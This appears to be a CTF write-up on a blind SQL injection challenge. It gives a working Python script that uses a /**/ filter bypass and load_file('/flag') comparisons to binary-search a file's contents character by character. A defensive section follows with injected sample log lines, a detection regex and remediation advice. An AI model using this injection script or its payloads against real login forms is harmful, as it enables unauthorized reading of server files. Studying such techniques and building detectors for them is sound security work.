The challenge filtered `union` and a large number of SQL functions; the intended solution was to read a file. I was too impatient at the time and didn't solve it, so I'm revisiting it now. The script is simple: it relies on ASCII string comparison, for example
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
Building on this logic, a binary search over each character can be written.
Here is the code.
import requests

url = 'http://localhost/index.php'


def func(x):
    # spaces are filtered, so replace them with inline comments
    x = x.replace(' ', '/**/')
    return x


flag = ''


def check(mid, mystr):
    # boolean condition: is the file content >= the guessed prefix?
    # "binary" forces a case-sensitive (byte-wise) comparison
    username = """hack' or binary (select load_file('/flag'))>='{0}'#"""
    username = func(username)
    username = username.format(mystr)
    password = 'hack'
    r = requests.post(url=url, data={'username': username, 'password': password})
    # the page shows "success" when the injected condition is true
    return 'success' in r.text


# recover one character per outer iteration with a binary search over 0..255
for i in range(1, 20):
    left = 0
    right = 255
    while left < right:
        mid = (left + right + 1) >> 1
        if check(mid, flag + chr(mid)):
            left = mid
        else:
            right = mid - 1
    flag += chr(left)
    print(flag)
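A defender-side counterpart, added here and not part of the original writeup: the challenge's blacklist was bypassed by writing `/**/` in place of spaces, so a detection rule has to normalise comments away before matching, and should key on the run of comparison probes rather than any single request. The log format and client addresses below are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample log (not from the original post): "client_ip<TAB>POST body".
# The first three lines mimic the probes the writeup's script sends; the last
# two are ordinary logins, one of which happens to contain a comment.
SAMPLE_LOG = """\
10.0.0.5\tusername=hack'/**/or/**/binary/**/(select/**/load_file('/flag'))>='A'#&password=hack
10.0.0.5\tusername=hack'/**/or/**/binary/**/(select/**/load_file('/flag'))>='AB'#&password=hack
10.0.0.5\tusername=hack'/**/or/**/binary/**/(select/**/load_file('/flag'))>='ABC'#&password=hack
10.0.0.9\tusername=alice&password=s3cret
10.0.0.9\tusername=bob/**/smith&password=pw
"""

COMMENT_RE = re.compile(r"/\*.*?\*/")
# A keyword blacklist that only looks for "union" never sees this payload;
# the rule below matches a file-read or subquery followed by a string comparison.
PROBE_RE = re.compile(r"\b(load_file|select)\b.*?(>=|<=|<|>|=)\s*'", re.IGNORECASE)


def normalise(body):
    """Collapse /**/ comment obfuscation into single spaces."""
    return " ".join(COMMENT_RE.sub(" ", body).split())


def find_probes(log_text):
    """Return (ip, normalised body) for every line that looks like a
    boolean comparison probe after comment normalisation."""
    hits = []
    for line in log_text.splitlines():
        ip, _, body = line.partition("\t")
        norm = normalise(body)
        if PROBE_RE.search(norm):
            hits.append((ip, norm))
    return hits


def suspicious_clients(log_text, threshold=3):
    """IPs that sent at least `threshold` probes: one probe may be noise,
    a run of them is the per-character search described above."""
    counts = Counter(ip for ip, _ in find_probes(log_text))
    return {ip for ip, n in counts.items() if n >= threshold}
```

The rule is only a detection layer; the actual fix is parameterised queries plus not granting the application's database account the FILE privilege that `load_file()` requires.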